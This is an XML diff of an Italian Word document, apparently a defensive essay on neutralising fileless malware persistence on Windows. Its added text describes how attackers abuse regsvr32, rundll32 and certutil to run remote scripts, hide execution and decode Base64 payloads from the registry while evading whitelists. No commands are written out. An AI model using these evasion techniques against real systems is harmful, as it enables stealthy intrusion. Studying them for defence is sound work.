+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>regsvr32.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Strumento destinato alla registrazione delle DLL, può essere abusato per scaricare ed eseguire script remoti direttamente in memoria. Essendo un binario Microsoft firmato, il suo utilizzo può eludere sistemi di controllo basati su </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>whitelist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> applicative, rendendo l’attività meno sospetta.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>r</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>undll32.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: È progettato per caricare ed eseguire funzioni contenute in librerie dinamiche. I malware fileless lo sfruttano per richiamare DLL di sistema e forzarle a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>interpretare codice malevolo come se fosse una funzione legittima, mascherando l’esecuzione all’interno di un processo affidabile.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragrafoelenco"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:rPr>
+          <w:color w:val="E8E8E8" w:themeColor="background2"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ertutil.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>: Utile per la gestione dei certificati digitali, potrebbe essere utilizzato come strumento di download o di decodifica. Può prelevare contenuti da server remoti oppure convertire stringhe codificate in Base64 memorizzate nel Registro in payload eseguibili, contribuendo alla strategia di attacco senza generare file evidenti sul disco.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1066,6 +1522,8 @@
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:color w:val="auto"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
@@ -1075,12 +1533,6 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-        </w:rPr>
-      </w:sdtEndPr>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -2194,6 +2646,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="47F0156F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="1390FD74"/>
+    <w:lvl w:ilvl="0" w:tplc="04100001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48147DBA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="59F8FA30"/>
@@ -2342,7 +2907,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48826219"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="23F60560"/>
@@ -2491,7 +3056,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4BCA3A0D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BA143F50"/>
@@ -2580,7 +3145,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="561B161F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9A64578A"/>
@@ -2729,7 +3294,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5ECB57B5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E3DAB198"/>
@@ -2815,7 +3380,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6267650E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1486BBBA"/>
@@ -2964,7 +3529,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="686A7968"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AF642DA8"/>
@@ -3113,7 +3678,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="695E02A4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1B76F0F0"/>
@@ -3262,7 +3827,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CDF7FB3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7084172C"/>
@@ -3411,7 +3976,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CEC6A36"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2C88B578"/>
@@ -3500,7 +4065,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7168611A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1808E96"/>
@@ -3613,7 +4178,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76AF5C5E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3FAAE8C2"/>
@@ -3700,13 +4265,127 @@
       <w:pPr>
         <w:ind w:left="6828" w:hanging="180"/>
       </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="772F064C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B224C640"/>
+    <w:lvl w:ilvl="0" w:tplc="17D6AB90">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:color w:val="000000" w:themeColor="text1"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="405763203">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="62338613">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="993728766">
     <w:abstractNumId w:val="3"/>
@@ -3732,34 +4411,34 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="340402470">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="840893291">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1137642995">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1901280077">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1505129166">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1966766617">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="1079909917">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="1981299414">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1699313517">
     <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="13" w16cid:durableId="1699313517">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
   <w:num w:numId="14" w16cid:durableId="998113943">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="2034728165">
     <w:abstractNumId w:val="0"/>
@@ -3768,13 +4447,19 @@
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="480774904">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="1595555786">
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="19" w16cid:durableId="1238134191">
     <w:abstractNumId w:val="17"/>
   </w:num>
-  <w:num w:numId="18" w16cid:durableId="1595555786">
-    <w:abstractNumId w:val="18"/>
+  <w:num w:numId="20" w16cid:durableId="1038969861">
+    <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="19" w16cid:durableId="1238134191">
-    <w:abstractNumId w:val="16"/>
+  <w:num w:numId="21" w16cid:durableId="1410880810">
+    <w:abstractNumId w:val="20"/>
   </w:num>
 </w:numbering>
 </file>
@@ -4382,6 +5067,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Carpredefinitoparagrafo">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabellanormale">
@@ -4731,6 +5417,48 @@
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B951B4"/>
+    <w:rPr>
+      <w:color w:val="467886" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Menzionenonrisolta">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B951B4"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Grigliatabellachiara">
+    <w:name w:val="Grid Table Light"/>
+    <w:basedOn w:val="Tabellanormale"/>
+    <w:uiPriority w:val="40"/>
+    <w:rsid w:val="00FA2A37"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+      </w:tblBorders>
+    </w:tblPr>
   </w:style>
 </w:styles>
 </file>

</xml_diff>

<commit_message>
aggiunta vettore di attacco
</commit_message>
<xml_diff>
--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -7,19 +7,73 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>Neutralizza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>re</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> persistenza di fileless </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve">malwares </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>su sistemi Windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>I fileless malware e i registri di sistema</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Introduzione</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27,42 +81,31 @@
         <w:rPr>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Il Registro di Sistema di Windows è un database gerarchico che memorizza le impostazioni di configurazione</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I </w:t>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nel panorama odierno della cybersicurezza si assiste a un cambiamento radicale nelle strategie di infezione: il progressivo abbandono dei tradizionali file eseguibili (.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) malevoli a favore di un approccio </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -71,7 +114,37 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>fileless malware</w:t>
+        <w:t>fileless</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Come suggerisce il termine, questa tipologia di minaccia non deposita </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>eseguibili</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sospetti sul disco rigido, ma opera sfruttando la memoria RAM e strumenti legittimi già presenti nel sistema </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -85,56 +158,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">possono sfruttare </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">particolari </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>chiavi d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
